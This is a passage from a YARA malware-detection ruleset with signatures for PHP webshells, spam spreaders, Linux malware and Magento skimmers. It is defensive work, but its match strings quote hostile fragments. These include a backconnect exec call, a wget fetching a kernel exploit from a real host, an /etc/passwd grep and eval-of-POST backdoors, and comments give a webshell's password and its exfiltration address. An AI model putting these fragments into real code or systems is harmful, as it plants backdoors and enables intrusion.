hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
strings:
$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
condition:
filesize < 900KB and all of them
}
rule Webshell_c99_4 {
meta:
description = "Detects C99 Webshell"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
strings:
$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
$s4 = "$ret = myshellexec($handler);" fullword ascii
$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
condition:
filesize < 900KB and 1 of them
}
rule Webshell_r57shell_2 {
meta:
description = "Detects Webshell R57"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
strings:
$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
condition:
filesize < 900KB and all of them
}
rule Webshell_27_9_acid_c99_locus7s {
meta:
description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
strings:
$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
condition:
filesize < 1711KB and 1 of them
}
rule Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 {
meta:
description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
strings:
$s1 = "$_POST['cmd'] = which('" ascii
$s2 = "$blah = ex(" fullword ascii
condition:
filesize < 600KB and all of them
}
rule Webshell_c100 {
meta:
description = "Detects Webshell - rule generated from from files c100 v. 777shell"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
strings:
$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
$s4 = "which wget curl w3m lynx" ascii
$s6 = "netstat -atup | grep IST" ascii
condition:
filesize < 685KB and 2 of them
}
rule Webshell_AcidPoison {
meta:
description = "Detects Poison Sh3ll - Webshell"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
strings:
$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
condition:
filesize < 550KB and all of them
}
rule Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 {
meta:
description = "Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
strings:
$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
condition:
filesize < 882KB and all of them
}
rule Webshell_Ayyildiz {
meta:
description = "Detects Webshell - rule generated from from files Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt, Macker's Private PHPShell.php, matamu.txt, myshell.txt, PHP Shell.txt"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
strings:
$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
condition:
filesize < 112KB and all of them
}
rule Webshell_zehir {
meta:
description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
strings:
$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
condition:
filesize < 200KB and 1 of them
}
/*
PHP file(s) (spreader) that, using multiple remote
servers, use file_get_contents() to get more PHP
content that it writes in files with random name
(echoers), file(s) which use file_get_contents()
to get and echo the HTML (chinese blog/shop/???).
*/
rule chinese_spam_spreader : webshell
{
meta:
author = "Vlad https://github.com/vlad-s"
date = "2016/07/18"
description = "Catches chinese PHP spam files (autospreaders)"
strings:
$a = "User-Agent: aQ0O010O"
$b = "<font color='red'><b>Connection Error!</b></font>"
$c = /if ?\(\$_POST\[Submit\]\) ?{/
condition:
all of them
}
rule chinese_spam_echoer : webshell
{
meta:
author = "Vlad https://github.com/vlad-s"
date = "2016/07/18"
description = "Catches chinese PHP spam files (printers)"
strings:
$a = "set_time_limit(0)"
$b = "date_default_timezone_set('PRC');"
$c = "$Content_mb;"
$d = "/index.php?host="
condition:
all of them
}
/*
Webshell "fire2013.php" - shell apended to PHP!Anuna code,
found in the wild both appended and single.
Shell prints a fake "404 not found" Apache message, while
the user has to post "pass=Fuck1950xx=" to enable it.
As written in the original (decoded PHP) file,
@define('VERSION', 'v4 by Sp4nksta');
Shell is also backdoored, it mails the shell location and
info on "h4x4rwow@yahoo.com" as written in the "system32()"
function.
*/
rule fire2013 : webshell
{
meta:
author = "Vlad https://github.com/vlad-s"
date = "2016/07/18"
description = "Catches a webshell"
strings:
$a = "eval(\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61"
$b = "yc0CJYb+O//Xgj9/y+U/dd//vkf'\\x29\\x29\\x29\\x3B\")"
condition:
all of them
}
/*
This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
// Linux/Moose yara rules
// For feedback or questions contact us at: github@eset.com
// https://github.com/eset/malware-ioc/
//
// These yara rules are provided to the community under the two-clause BSD
// license as follows:
//
// Copyright (c) 2015, ESET
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// 1. Redistributions of source code must retain the above copyright notice, this
// list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
private rule is_elf
{
strings:
$header = { 7F 45 4C 46 }
condition:
$header at 0
}
rule moose
{
meta:
Author = "Thomas Dupuy"
Date = "2015/04/21"
Description = "Linux/Moose malware"
Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf"
Source = "https://github.com/eset/malware-ioc/"
Contact = "github@eset.com"
License = "BSD 2-Clause"
strings:
$s0 = "Status: OK"
$s1 = "--scrypt"
$s2 = "stratum+tcp://"
$s3 = "cmd.so"
$s4 = "/Challenge"
$s7 = "processor"
$s9 = "cpu model"
$s21 = "password is wrong"
$s22 = "password:"
$s23 = "uthentication failed"
$s24 = "sh"
$s25 = "ps"
$s26 = "echo -n -e "
$s27 = "chmod"
$s28 = "elan2"
$s29 = "elan3"
$s30 = "chmod: not found"
$s31 = "cat /proc/cpuinfo"
$s32 = "/proc/%s/cmdline"
$s33 = "kill %s"
condition:
is_elf and all of them
}
/*
This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
long as you use it under this license.
*/
private rule is__elf
{
meta:
author = "@mmorenog,@yararules"
strings:
$header = { 7F 45 4C 46 }
condition:
$header at 0
}
rule ELF_Linux_Torte : Linux ELF
{
meta:
author = "@mmorenog,@yararules"
description = "Detects ELF Linux/Torte infection"
ref = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
hash1 = "1faf27f6b8e8a9cadb611f668a01cf73"
hash2 = "cb0477445fef9c5f1a5b6689bbfb941e"
strings:
$s0 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)"
$s1 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
$s2 = "?sessd="
$s3 = "&sessc="
$s4 = "&sessk="
$s5 = "3a08fe7b8c4da6ed09f21c3ef97efce2"
$s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
$s7 = "_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE"
$s8 = "_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4"
$s9 = "_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm"
$s10 = "_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1_"
$s11 = "_ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4"
condition:
is__elf and all of ($s*)
}
rule ELF_Linux_Torte_domains {
meta:
author = "@mmorenog,@yararules"
description = "Detects ELF Linux/Torte infection"
ref1 = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
strings:
$1 = "pages.touchpadz.com" ascii wide nocase
$2 = "bat.touchpadz.com" ascii wide nocase
$3 = "stat.touchpadz.com" ascii wide nocase
$4 = "sk2.touchpadz.com" ascii wide nocase
condition:
any of them
}
/*
This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
/*
ref : https://github.com/gwillem/magento-malware-scanner/blob/master/rules/backend.yar
author : https://github.com/gwillem
*/
rule dump_sales_quote_payment {
strings: $ = "include '../../../../../../../../../../app/Mage.php'; Mage::app(); $q = Mage::getModel('sales/quote_payment')->getCollection();"
condition: any of them
}
rule dump_sales_order {
strings: $ = "../../../../../../app/Mage.php'; Mage::app(); var_dump(Mage::getModel('sales/order')"
condition: any of them
}
rule md5_64651cede2467fdeb1b3b7e6ff3f81cb {
strings: $ = "rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9"
condition: any of them
}
rule md5_6bf4910b01aa4f296e590b75a3d25642 {
strings: $ = "base64_decode('b25lcGFnZXxnY19hZG1pbg==')"
condition: any of them
}
rule fopo_webshell {
strings:
$ = "DNEcHdQbWtXU3dSMDA1VmZ1c29WUVFXdUhPT0xYb0k3ZDJyWmFVZlF5Y0ZEeHV4K2FnVmY0OUtjbzhnc0"
$ = "U3hkTVVibSt2MTgyRjY0VmZlQWo3d1VlaFJVNVNnSGZUVUhKZXdEbGxJUTlXWWlqWSt0cEtacUZOSXF4c"
$ = "rb2JHaTJVdURMNlhQZ1ZlTGVjVnFobVdnMk5nbDlvbEdBQVZKRzJ1WmZUSjdVOWNwWURZYlZ0L1BtNCt"
condition: any of them
}
rule eval_post {
strings:
$ = "eval(base64_decode($_POST"
$ = "eval($undecode($tongji))"
$ = "eval($_POST"
condition: any of them
}
rule spam_mailer {
strings:
$ = "<strong>WwW.Zone-Org</strong>"
$ = "echo eval(urldecode("
condition: any of them
}
rule md5_0105d05660329704bdb0ecd3fd3a473b {
/*
)){eval (${ $njap58}['q9e5e25' ])
) ) { eval ( ${$yed7 }['
*/
strings: $ = /\)\s*\)\s*\{\s*eval\s*\(\s*\$\{/
condition: any of them
}
rule md5_2495b460f28f45b40d92da406be15627 {
strings: $ = "$dez = $pwddir.\"/\".$real;copy($uploaded, $dez);"
condition: any of them
}
rule md5_2c37d90dd2c9c743c273cb955dd83ef6 {
strings: $ = "@$_($_REQUEST['"
condition: any of them
}
rule md5_3ccdd51fe616c08daafd601589182d38 {
strings: $ = "eval(xxtea_decrypt"
condition: any of them
}
rule md5_4b69af81b89ba444204680d506a8e0a1 {
strings: $ = "** Scam Redirector"
condition: any of them
}
rule md5_71a7c769e644d8cf3cf32419239212c7 {
/*
// $GLOBALS['ywanc2']($GLOBALS['ggbdg61']
*/
strings: $ = /\$GLOBALS\['[\w\d]+'\]\(\$GLOBALS\['[\w\d]+'\]/
condition: any of them
}
rule md5_825a3b2a6abbe6abcdeda64a73416b3d {
/*
// $ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_SERVER["SERVER_NAME"]);
// if(!oo00o0OOo0o00O("fsockopen"))
// strings: $ = "$ooooo00oo0000oo0"
*/
strings: $ = /[o0O]{3}\("fsockopen"\)/
condition: any of them
}
rule md5_87cf8209494eedd936b28ff620e28780 {
strings: $ = "curl_close($cu);eval($o);};die();"
condition: any of them
}
rule md5_9b59cb5b557e46e1487ef891cedaccf7 {
strings:
$jpg = { FF D8 FF E0 ?? ?? 4A 46 49 46 00 01 }
/*
// https://en.wikipedia.org/wiki/List_of_file_signatures
// magic module is not standard compiled in on our platform
// otherwise: condition: magic.mime_type() == /^image/
// $jpg = { 4A 46 49 46 00 01 }
*/
$php = "<?php"
condition: ($jpg at 0) and $php
}
rule md5_c647e85ad77fd9971ba709a08566935d {
strings: $ = "fopen(\"cache.php\", \"w+\")"
condition: any of them
}
rule md5_fb9e35bf367a106d18eb6aa0fe406437 {
strings: $ = "0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js"
condition: any of them
}
rule md5_8e5f7f6523891a5dcefcbb1a79e5bbe9 {
strings: $ = "if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}"
condition: any of them
}
rule indoexploit_autoexploiter {
strings: $ = "echo \"IndoXploit - Auto Xploiter\""
condition: any of them
}
rule eval_base64_decode_a {
strings: $ = "eval(base64_decode($a));"
condition: any of them
}
rule obfuscated_eval {
strings:
$ = /\\x65\s*\\x76\s*\\x61\s*\\x6C/
$ = "\"/.*/e\""
condition: any of them
}
rule md5_50be694a82a8653fa8b31d049aac721a {
strings: $ = "(preg_match('/\\/admin\\/Cms_Wysiwyg\\/directive\\/index\\//', $_SERVER['REQUEST_URI']))"
condition: any of them
}
rule md5_ab63230ee24a988a4a9245c2456e4874 {
strings: $ = "eval(gzinflate(base64_decode(str_rot13(strrev("
condition: any of them
}
rule md5_b579bff90970ec58862ea8c26014d643 {
/* forces php execution of image files, dropped in an .htaccess file under media */
strings: $ = /<Files [^>]+.(jpg|png|gif)>\s*ForceType application\/x-httpd-php/
condition: any of them
}
rule md5_d30b23d1224438518d18e90c218d7c8b {
strings: $ = "attribute_code=0x70617373776f72645f68617368"
condition: any of them
}
rule md5_24f2df1b9d49cfb02d8954b08dba471f {
strings: $ = "))unlink('../media/catalog/category/'.basename($"
condition: any of them
}
rule base64_hidden_in_image {
strings: $ = /JPEG-1\.1[a-zA-Z0-9\-\/]{32}/
condition: any of them
}
rule hide_data_in_jpeg {
strings: $ = /file_put_contents\(\$.{2,3},'JPEG-1\.1'\.base64_encode/
condition: any of them
}
rule hidden_file_upload_in_503 {
strings: $ = /error_reporting\(0\);\$f=\$_FILES\[\w+\];copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);/
condition: any of them
}
rule md5_fd141197c89d27b30821f3de8627ac38 {
strings: $ = "if(isset($_GET['do'])){$g0='adminhtml/default/default/images'"
condition: any of them
}
rule visbot {
strings:
$ = "stripos($buf, 'Visbot')!==false && stripos($buf, 'Pong')!==false"
$ = "stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong')"
condition: any of them
}
rule md5_39ca2651740c2cef91eb82161575348b {
strings: $ = /if\(md5\(@\$_COOKIE\[..\]\)=='.{32}'\) \(\$_=@\$_REQUEST\[.\]\).@\$_\(\$_REQUEST\[.\]\);/
condition: any of them
}
rule md5_4c4b3d4ba5bce7191a5138efa2468679 {
strings:
$ = "<?PHP /*** Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php**/$"
$ = "$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'"
condition: any of them
}
rule md5_6eb201737a6ef3c4880ae0b8983398a9 {
strings:
$ = "if(md5(@$_COOKIE[qz])=="
$ = "($_=@$_REQUEST[q]).@$_($_REQUEST[z]);"
condition: all of them
}
rule md5_d201d61510f7889f1a47257d52b15fa2 {
strings: $ = "@eval(stripslashes($_REQUEST[q]));"
condition: any of them
}
rule md5_06e3ed58854daeacf1ed82c56a883b04 {
strings: $ = "$log_entry = serialize($ARINFO)"
condition: any of them
}
rule md5_28690a72362e021f65bb74eecc54255e {
strings: $ = "curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));"
condition: any of them
}
rule overwrite_globals_hack {
strings: $ = /\$GLOBALS\['[^']{,20}'\]=Array\(/
condition: any of them
}
rule md5_4adef02197f50b9cc6918aa06132b2f6 {
/* { eval($cco37(${ $kasd1}[ 'n46b398' ] ) );} */
strings: $ = /\{\s*eval\s*\(\s*\$.{1,5}\s*\(\$\{\s*\$.{1,5}\s*\}\[\s*'.{1,10}'\s*\]\s*\)\s*\);\}/
condition: any of them
}
rule obfuscated_globals {
/* $GLOBALS['y63581'] = "\x43 */
strings: $ = /\$GLOBALS\['.{1,10}'\] = "\\x/
condition: any of them
}
rule ld_preload_backdoor {
strings: $ = "killall -9 \".basename(\"/usr/bin/host"
condition: any of them
}
rule fake_magentoupdate_site {
strings: $ = "magentopatchupdate.com"
condition: any of them
}
rule md5_b3ee7ea209d2ff0d920dfb870bad8ce5 {
strings:
$ = /\$mysql_key\s*=\s*@?base64_decode/
$ = /eval\(\s*\$mysql_key\s*\)/
condition: all of them
}
rule md5_e03b5df1fa070675da8b6340ff4a67c2 {
strings:
$ = /if\(preg_match\("\/onepage\|admin\/",\s*\$_SERVER\['REQUEST_URI'\]\)\)\{\s*@?file_put_contents/
$ = /@?base64_encode\(serialize\(\$_REQUEST\)\."--"\.serialize\(\$_COOKIE\)\)\."\\n",\s*FILE_APPEND\)/
condition: any of them
}
rule md5_023a80d10d10d911989e115b477e42b5 {
strings: $ = /chr\(\d{,3}\)\.\"\"\.chr\(\d{,3}\)/
condition: any of them
}
rule md5_4aa900ddd4f1848a15c61a9b7acd5035 {
strings: $ = "'base'.(128/2).'_de'.'code'"
condition: any of them
}
rule md5_f797dd5d8e13fe5c8898dbe3beb3cc5b {
strings: $ = "echo(\"FILE_Bad\");"
condition: any of them
}
/*
This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
/*
ref : https://github.com/gwillem/magento-malware-scanner
author : https://github.com/gwillem
*/
rule onepage_or_checkout {
strings: $ = "\\x6F\\x6E\\x65\\x70\\x61\\x67\\x65\\x7C\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x74"
condition: any of them
}
rule sinlesspleasure_com {
strings: $ = "5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92"
condition: any of them
}
rule amasty_biz {
strings: $ = "118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117"
condition: any of them
}
rule amasty_biz_js {
strings: $ = "t_p#0.qlb#0.#1Blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0"
condition: any of them
}
rule returntosender {
